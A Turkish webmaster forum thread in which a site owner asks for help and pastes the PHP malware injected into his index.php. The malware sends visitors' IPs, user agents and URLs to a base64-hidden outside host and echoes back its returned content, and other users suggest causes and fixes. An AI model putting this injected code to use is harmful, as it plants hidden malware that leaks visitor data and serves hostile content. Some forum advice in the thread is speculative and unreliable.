lostyazilim
tr.link

Siteme virüs bulaştı. Bakabilir misiniz?

11 Mesajlar 2.745 Okunma
acebozum
tr.link

erbasaran erbasaran Yazılım Mühendisi Kullanıcı
  • Üyelik 01.07.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek Yazılım Mühendisi
  • Konum Ankara
  • Ad Soyad R** E**
  • Mesajlar 309
  • Beğeniler 2 / 77
  • Ticaret 70, (%100)
Merhaba arkadaşlar. Bugün saat 09:46 'da index.php dosyamın chmod ayarı 755 olmuş. Ayrıca dosyaya birkaç satır kod eklenmiş. Bu kodu aşağıya ekledim. İnceleyebilir misiniz? Nasıl bir virüs bu. Eset Smart Security JS/Iframe.DA truva atı olarak tanımladı. Nasıl olmuş ve bu kod tam olarak ne işe yarıyor, yardımcı olabilirseniz sevinirim.

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
 

 

imza yok...
wmaraci
reklam

EftalBulut EftalBulut WM Aracı Kullanıcı
  • Üyelik 26.08.2011
  • Yaş/Cinsiyet 28 / E
  • Meslek Webmaster
  • Konum İstanbul Avrupa
  • Ad Soyad E** B**
  • Mesajlar 836
  • Beğeniler 106 / 217
  • Ticaret 180, (%100)
Hocam bu virus banada bulaştı.Ben FTP ve DB sifrelerini değiştirerek kaldırdım.

Virus FTP şifresini bildiği için siz kaldırdıgınızda otomatik ekliyor.

Ayrıca GoogleBot sitenize girdiginde otomatik siteden atan bir virus.
 

 

erbasaran erbasaran Yazılım Mühendisi Kullanıcı
  • Üyelik 01.07.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek Yazılım Mühendisi
  • Konum Ankara
  • Ad Soyad R** E**
  • Mesajlar 309
  • Beğeniler 2 / 77
  • Ticaret 70, (%100)
Nasıl oldu anlayamadım. Şifremi değiştirdim zaten. Bakalım ne olacak. Başka yorum yapabiecek olan varsa sevinirim.
 

 

imza yok...

yldrmesut yldrmesut Makale & Web Kullanıcı
  • Üyelik 09.07.2011
  • Yaş/Cinsiyet 31 / E
  • Meslek Makale & Web
  • Konum Diğer
  • Ad Soyad M** Y**
  • Mesajlar 86
  • Beğeniler 17 / 9
  • Ticaret 17, (%94)
Eğer bu site bir blog sitesi ise veya içeriği zengin bir site ise veri çekme olabilir ya da sitenize yönetici bazlı bir giriş fiiliyatına müteakip bir saldırı olabilir. CURLOPT_RETURNTRANSFER genellikle sitelere kullanıcı girişi için kullanıldığını biliyorum yanlış değilsem... index'inizi tekrar yazın
 

 

wmaraci
wmaraci

erbasaran erbasaran Yazılım Mühendisi Kullanıcı
  • Üyelik 01.07.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek Yazılım Mühendisi
  • Konum Ankara
  • Ad Soyad R** E**
  • Mesajlar 309
  • Beğeniler 2 / 77
  • Ticaret 70, (%100)
Satır satır kodları inceledim. Sadece bu kodlar eklenmiş. Fakat yönetici bazlı giriş derken cpanele giriş mi diyorsunuz yoksa scriptin admin paneline mi girişi diyorsunuz. Eğer admin paneline girişten bahsediyorsanız, ordan index.php yi ne değiştirme ihtimali var; ne de chmod ayarlarını değiştirme ihtimali var. Eğer index.php mi değiştirebiliyorsa shell falan da sokmuş olabilir. :(
 

 

imza yok...

yldrmesut yldrmesut Makale & Web Kullanıcı
  • Üyelik 09.07.2011
  • Yaş/Cinsiyet 31 / E
  • Meslek Makale & Web
  • Konum Diğer
  • Ad Soyad M** Y**
  • Mesajlar 86
  • Beğeniler 17 / 9
  • Ticaret 17, (%94)
Biz Shell'leri atmak için en fazla php sistemlerine saldırırız, ben de Shell attım, veri çektim lakin php'nin sürekli gelişen bir yapı olduğu için sistemi tam olarak anlamak biraz uğraştırır
 

 

erbasaran erbasaran Yazılım Mühendisi Kullanıcı
  • Üyelik 01.07.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek Yazılım Mühendisi
  • Konum Ankara
  • Ad Soyad R** E**
  • Mesajlar 309
  • Beğeniler 2 / 77
  • Ticaret 70, (%100)
Anladım. Bu bir bot gibi birşeyle yapılmış sanırım. 3-4 tane index.php dosyası vardı. hepsi de 09:46:00 da değiştirilmiş ve hmod ayarları 755 olmuş. Hepsini temizledim. Bakalım tekrar olur mu. Ama büyük bir ihtimal script te açık var. Zaten açık olduğunu sanıyordum. Demekki varmış :)
 

 

imza yok...

cybersoldier cybersoldier cybersoldier Kullanıcı
  • Üyelik 16.03.2012
  • Yaş/Cinsiyet 43 / E
  • Meslek elektronik
  • Konum Adana
  • Ad Soyad ** **
  • Mesajlar 225
  • Beğeniler 126 / 41
  • Ticaret 1, (%0)
dostum geçmiş olsun sormak istediğim bir kaç soru var birincisi sitenizin scripti nedir ikincisi vürüs bulaştığını nasıl anladınız biz sitemizi test etmek istersek ne yapmalıyız
 

 

erbasaran erbasaran Yazılım Mühendisi Kullanıcı
  • Üyelik 01.07.2011
  • Yaş/Cinsiyet 34 / E
  • Meslek Yazılım Mühendisi
  • Konum Ankara
  • Ad Soyad R** E**
  • Mesajlar 309
  • Beğeniler 2 / 77
  • Ticaret 70, (%100)
Siteni falan test etmene gerek yok. Bende Eset Smart Security 5.0.95 yüklü. Bugün öğlede siteme girince truva atı uyarısı verdi. Neden olabilir diye baktım. Ftp'ye girdim ve index.php nin bugün sabah değiştirildiğini ve chmod ayarının 755 yapıldığını gördüm. Sonra dosyayı inceledim. En alta (üstte verdiğim) kod eklemişti. Ben de sildim ve site düzeldi. :)
 

 

imza yok...

cybersoldier cybersoldier cybersoldier Kullanıcı
  • Üyelik 16.03.2012
  • Yaş/Cinsiyet 43 / E
  • Meslek elektronik
  • Konum Adana
  • Ad Soyad ** **
  • Mesajlar 225
  • Beğeniler 126 / 41
  • Ticaret 1, (%0)
hımm anladım yinede merak ediyorum hangi scripti kullandıgını malum hosta girmek icin bir acıkmı kullanmıslar
 

 

wmaraci
wmaraci
Konuyu toplam 2 kişi okuyor. (0 kullanıcı ve 2 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al